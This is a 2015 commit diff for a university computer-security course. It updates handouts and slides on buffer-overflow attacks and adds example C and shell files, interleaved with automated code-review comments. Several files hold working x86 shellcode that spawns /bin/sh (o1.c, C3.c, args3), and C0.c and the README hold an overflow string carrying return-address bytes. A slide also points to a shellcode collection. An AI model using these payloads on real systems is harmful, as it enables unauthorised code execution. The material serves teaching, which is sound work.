Binary file handouts/ho03.pdf has changed
--- a/handouts/ho03.tex Wed Oct 07 18:03:32 2015 +0100
+++ b/handouts/ho03.tex Thu Oct 08 12:08:10 2015 +0100
@@ -426,20 +426,22 @@
\lstinputlisting[language=C,numbers=none]{../progs/shell.c}
-\noindent Once compiled, we can use the debugger to obtain
-the machine code, or even the ready-made encoding as character
+\noindent Once compiled, we can use the debugger to obtain the
+machine code, or even get the ready-made encoding as character
sequence.
+\lstinputlisting[language=C,numbers=none]{../progs/o2.c}
+
While not too difficult, obtaining this string is not entirely
trivial using \pcode{gdb}. Remember the functions in C that
copy or fill buffers work such that they copy everything until
the zero byte is reached. Unfortunately the ``vanilla'' output
-from the debugger for the shell-program above will contain
-such zero bytes. So a post-processing phase is needed to
-rewrite the machine code in a way that it does not contain any
-zero bytes. This is like some works of literature that have
-been written so that the letter e, for example, is avoided.
-The technical term for such a literature work is
+from the debugger for the shell-program above contains such
+zero bytes. So a post-processing phase is needed to rewrite
+the machine code in a way that it does not contain any zero
+bytes. This is like some works of literature that have been
+written so that the letter e, for example, is avoided. The
+technical term for such a literature work is
\emph{lipogram}.\footnote{The most famous example of a
lipogram is a 50,000 words novel titled Gadsby, see
\url{https://archive.org/details/Gadsby}, which avoids the
@@ -531,7 +533,10 @@
\begin{figure}[p]
\lstinputlisting[language=C]{../progs/C3.c}
\caption{Overwriting a buffer with a string containing a
-payload.\label{C3}}
+payload. Lines 14 and 15 write the address of the buffer
+into \pcode{large\_string}. The payload is copied in
+Lines 17 and 18. Line 20 copies the (too large) string
+into the buffer.\label{C3}}
\end{figure}
By the way you might naw have the question how do attackers
@@ -808,6 +813,8 @@
\texttt{n}, the number can be omitted
\item \texttt{disassemble fun-name} -- show the assembly code
of a function
+\item \texttt{info registers} -- prints out the current
+content of all registers
\item \texttt{run args} -- starts the program, potential
arguments can be given
\item \texttt{(b)reak line-number} -- sets break point
@@ -817,6 +824,7 @@
from address \pcode{addr}, the address could be \code{$esp}
for looking at the content of the stack
\item \texttt{x/nxb addr} -- prints out \texttt{n} bytes
+\item \texttt{q} -- quits the debugger
\end{itemize}
--- a/progs/C0.c Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/C0.c Thu Oct 08 12:08:10 2015 +0100
@@ -13,7 +13,6 @@
int main (int argc, char **argv)
{
- foo("my string is too long !!!!!");
- //foo("my string is too long !!!!! \x15\xcd\x5d\x07");
+ foo("my string is too long !!!!! ");
return 0;
}
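Review bot: The only change to the `foo(...)` call is a trailing space inside the string literal, which makes the argument one byte longer (28 characters plus the terminator), yet nothing in C0.c records that this length is deliberate; the removed comment with the address bytes was the only hint and it now lives in progs/README, so a later reader will "fix" the stray space. Suggest a comment on the call such as `/* length is deliberate: 28 chars + NUL; see progs/README for the longer variant */`. `foo` itself is outside the hunk, so the buffer it writes cannot be checked here; `argc`/`argv` are unused, so `int main(void)` would also be the cleaner signature.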
--- a/progs/C3.c Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/C3.c Thu Oct 08 12:08:10 2015 +0100
@@ -3,6 +3,7 @@
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
+
char large_string[128];
void main() {
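Review bot: The blank line inserted as new line 6 of C3.c shifts every later line of the file down by one, while the caption added to ho03.tex in this same commit refers to lines 14, 15, 17, 18 and 20 of this file by number; if those were counted against the old layout they are now off by one, so they should be re-checked against the listing as rendered with `[language=C]` line numbering. Hard-coded line references in a caption are fragile; a short comment on the referenced statements in C3.c (e.g. `/* store the buffer address into large_string */` on the lines the caption describes) would survive further edits. Separately, `void main()` on the last line is the non-standard form; hosted C requires `int main(void)`, and that function continues outside the hunk.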
--- a/progs/README Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/README Thu Oct 08 12:08:10 2015 +0100
@@ -23,6 +23,8 @@
Add the bigger string and the long is printed out differently.
+foo("my string is too long !!!!! \x15\xcd\x5d\x07");
+
C1.c
====
--- a/progs/args3 Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/args3 Thu Oct 08 12:08:10 2015 +0100
@@ -5,7 +5,8 @@
# cannot contain any \x00)
-shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
+shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62
+ \x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
# 24 bytes of shellcode
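Review bot: Splitting the double-quoted assignment across the two new lines puts a literal newline plus the leading spaces of the continuation line into `$shellcode`, because inside double quotes the shell keeps a bare newline and any indentation verbatim; the value is then no longer the 24 bytes the comment on the next line promises, and the `\x` escapes are untouched by this so nothing rescues it. If the wrap is only for readability, end the first line with a backslash immediately before the newline and start the continuation at column 0, or build the value in two statements: `shellcode="…\x62"` followed by `shellcode="${shellcode}\x69…"`. The rest of the script is outside the hunk, so how the variable is consumed cannot be checked here.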
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/o1.c Thu Oct 08 12:08:10 2015 +0100
@@ -0,0 +1,5 @@
+char shellcode[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
+ "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
+ "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
+ "\xff\xff/bin/sh";
\ No newline at end of file
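Review bot: The new file ends without a trailing newline (the `\ No newline at end of file` marker), which C11 5.1.1.2 requires of a non-empty source file and which some compilers warn about; add one. The array also carries no comment on its origin or role — the slide added in this commit presents it as the "String from the Web" and it appears to be pulled in only via `\lstinputlisting` — so a one-line header such as `/* third-party string shown in slides03 "String from the Web"; presumably listing-only, contrast with o2.c */` would tell a reader why two near-identical `shellcode` files exist.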
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/o2.c Thu Oct 08 12:08:10 2015 +0100
@@ -0,0 +1,5 @@
+char shellcode[] =
+ "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04"
+ "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8"
+ "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff"
+ "\xc9\xc3";
Binary file slides/slides03.pdf has changed
--- a/slides/slides03.tex Wed Oct 07 18:03:32 2015 +0100
+++ b/slides/slides03.tex Thu Oct 08 12:08:10 2015 +0100
@@ -331,7 +331,7 @@
\frametitle{Starting a Shell}
\small
-\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}
+\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o2.c}
\begin{textblock}{7}(5,7.5)
\begin{bubble}[7cm]
@@ -361,6 +361,24 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\begin{frame}[t]
+\frametitle{String from the Web}
+
+{\small
+\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}}
+\bigskip\bigskip
+
+\noindent
+More ``interesting'' shell programs can be found at
+
+\begin{center}
+\url{http://shellblade.net/shellcode.html}
+\end{center}
+
+\end{frame}
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\begin{frame}[c]
\frametitle{Overflow.c}
\mbox{}\\[-10mm]